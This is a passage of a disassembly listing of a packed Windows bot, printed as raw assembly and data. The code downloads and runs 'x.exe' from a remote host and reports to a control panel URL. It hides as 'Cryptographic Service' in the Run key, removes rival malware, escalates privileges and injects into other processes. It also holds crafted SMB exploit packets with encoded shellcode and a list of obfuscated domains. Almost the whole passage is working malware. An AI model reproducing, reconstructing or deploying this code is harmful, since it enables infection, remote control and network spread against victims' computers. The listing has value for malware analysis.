push eax
call dword_3142115C
mov esi, dword_31421068
push eax
lea eax, [ebp+var_28]
push eax
call esi
push dword_31424FFC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3142111C
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314242BA
call esi
push offset byte_314242B8
call dword_31421084
mov byte_314242B8[eax], 0DFh
pop esi
leave
retn
sub_31422712 endp
; ---------------------------------------------------------------------------
loc_3142276E: ; DATA XREF: sub_314223B2+166�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31425004, ebx
call sub_31422038
mov esi, dword_31421094
mov edi, 1388h
test eax, eax
jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279A�j
push edi
call esi
call sub_31422038
test eax, eax
jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278E�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31421130
test byte ptr [esp+14h], 2
push 50h
mov dword_31425008, ebx
pop ebp
mov word_3142500C, 96h
jz short loc_314227D9
mov dword_31425008, 1
mov ebp, 15Eh
mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BF�j
call sub_31421FF9
mov ebx, eax
call sub_31422712
cmp ebx, 100007Fh
jz short loc_314227FA
push ebx
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EB�j
mov dword ptr [esp+10h], 4
loc_31422802: ; CODE XREF: UPX0:31422813�j
push ebx
push offset sub_314225C3
call sub_31421F52
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31422802
test ebp, ebp
jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828�j
push 0
push offset sub_3142264B
call sub_31421F52
pop ecx
dec ebp
pop ecx
jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817�j
; UPX0:31422836�j ...
call sub_31422038
test eax, eax
jz short loc_31422838
push edi
call esi
jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831�j
; UPX0:31422844�j
call sub_31422038
test eax, eax
jnz short loc_31422846
push edi
call esi
jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283F�j
call sub_31422712
jmp short loc_3142282A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93�p
; sub_31422B67+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C
test eax, eax
jnz short loc_31422880
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421010
push [ebp+arg_4]
call dword_31421014
loc_31422880: ; CODE XREF: sub_3142284D+1C�j
pop ebp
retn
sub_3142284D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33�p
; sub_314229E6+84�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C
test eax, eax
jz short loc_314228AE
push 1
pop eax
jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31421008
test eax, eax
jz short loc_314228CD
push 2
pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46�j
push [ebp+arg_10]
call dword_31421014
mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2A�j
pop esi
leave
retn
sub_31422882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96�p
; sub_31422B67+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421000
test eax, eax
jz short loc_31422904
push 1
pop eax
jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421004
test eax, eax
jz short loc_31422920
push 2
pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40�j
push [ebp+arg_4]
call dword_31421014
mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27�j
pop esi
pop ebp
retn
sub_314228DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31421084
mov esi, eax
dec esi
test esi, esi
jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31422957
dec esi
jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24�j
push 0
push 2
call sub_31422D2C
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_314229E2
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31422CD6
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31422D26
test eax, eax
jz short loc_314229E2
lea esi, [esi+ebx+1]
loc_3142299F: ; CODE XREF: sub_3142292E+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31421104
pop ecx
test eax, eax
pop ecx
jz short loc_314229CF
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314210B0
push 0
push eax
call dword_31421060
loc_314229CF: ; CODE XREF: sub_3142292E+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31422D20
test eax, eax
jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1A�j
; sub_3142292E+38�j ...
pop esi
pop ebx
leave
retn
sub_3142292E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237B�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422A8D
push ebx
push edi
push esi
call sub_3142284D
lea eax, [ebp+var_13C]
push eax
call sub_3142292E
add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31422A56
pop edi
pop esi
pop ebx
leave
retn
sub_314229E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1�p
; sub_31422B67+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31422AB0
push [ebp+arg_0]
call dword_31421074
loc_31422AB0: ; CODE XREF: sub_31422A9B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3142108C
test eax, eax
jz locret_31422B65
push esi
call dword_314210FC
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31421F73
mov esi, dword_31421088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314241F0
push eax
call esi
lea eax, [ebp+var_78]
push offset dword_314241F8
push eax
call esi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31421050
lea eax, [ebp+var_78]
push eax
call dword_31421084
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_314228DB
add esp, 14h
push dword_31424FF4
call dword_3142107C
lea eax, [ebp+var_78]
push 0
push eax
call dword_31421054
push 1F4h
call dword_31421094
push 0
call dword_314210E0
pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23�j
leave
retn
sub_31422A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31421048
test eax, eax
jz loc_31422CA0
and dword_31425010, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422BED
call dword_314210FC
push 0Ah
mov ebx, offset aJutgkfousuoenl ; "jutgkfousuoenlppl"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31421F73
pop ecx
pop ecx
push ebx
call dword_31421084
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_314228DB
add esp, 14h
jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4D�j
lea eax, [ebp+var_20]
push eax
push offset aJutgkfousuoenl ; "jutgkfousuoenlppl"
call dword_31421068
loc_31422BFC: ; CODE XREF: sub_31422B67+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422C42
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_314228DB
lea eax, [ebp+var_84]
push eax
push 0
call sub_31422A9B
add esp, 1Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3142104C
test eax, eax
jnz short loc_31422C8B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422CA0
push ebx
push edi
push esi
mov dword_31425010, 1
call sub_3142284D
add esp, 0Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31422A9B
pop ecx
pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1F�j
; sub_31422B67+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31422B67 endp
; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CA�p
; sub_314215C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31421044
retn
sub_31422CA5 endp
; =============== S U B R O U T I N E =======================================
sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10B�p
; sub_314215C7+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31421040
retn
sub_31422CB9 endp
; ---------------------------------------------------------------------------
align 10h
loc_31422CD0: ; DATA XREF: sub_31421422+A�o
; sub_314223B2+A�o
jmp dword ptr loc_31421100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CD6 proc near ; CODE XREF: sub_31421801+128�p
; sub_31421801+134�p ...
jmp dword_314210F8
sub_31422CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CDC proc near ; CODE XREF: sub_31421801+9C�p
; sub_31421801+C5�p ...
jmp dword_314210F4
sub_31422CDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CE2 proc near ; CODE XREF: sub_31421801+93�p
; sub_31421801+B2�p ...
jmp dword_314210F0
sub_31422CE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31422CF0 proc near ; CODE XREF: sub_31421801+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31422D10
loc_31422CFC: ; CODE XREF: sub_31422CF0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31422CFC
loc_31422D10: ; CODE XREF: sub_31422CF0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31422CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D20 proc near ; CODE XREF: sub_3142292E+AB�p
jmp dword_31421064
sub_31422D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D26 proc near ; CODE XREF: sub_3142292E+64�p
jmp dword_3142105C
sub_31422D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D2C proc near ; CODE XREF: sub_3142292E+2D�p
jmp dword_31421058
sub_31422D2C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4B3h dup(0)
dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31421422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314215C7+84�o
align 10h
byte_31424080 db 0 ; DATA XREF: sub_314216A2+1B�r
off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23�r
align 2
dd offset dword_314241D4
dw 0C401h
dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h
dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h
dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74h ; DATA XREF: UPX0:31424086�o
dword_314241E4 dd 617A616Dh, 616B6166h, 75722Eh ; DATA XREF: UPX0:off_31424081�o
dword_314241F0 dd 6578652Eh, 0 ; DATA XREF: sub_314211A0+75�o
; sub_3142207E+55�o ...
dword_314241F8 dd 5Ch ; DATA XREF: sub_314211A0+49�o
; sub_31422A9B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314211A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0
; DATA XREF: sub_314215C7+57�o
align 8
byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24E�o
; sub_31421801+260�o ...
db 58h
word_314242BA dw 7468h ; DATA XREF: sub_31422712+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31421801+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31421801+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_31421801+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 ; DATA XREF: sub_31421801+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h ; DATA XREF: sub_31421801+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h ; DATA XREF: sub_31421801+D�r
dword_31424C88 dd 0E4FF07h ; DATA XREF: sub_31421801+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D38 dd 0E9F3F5h ; DATA XREF: sub_3142207E+112�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 4
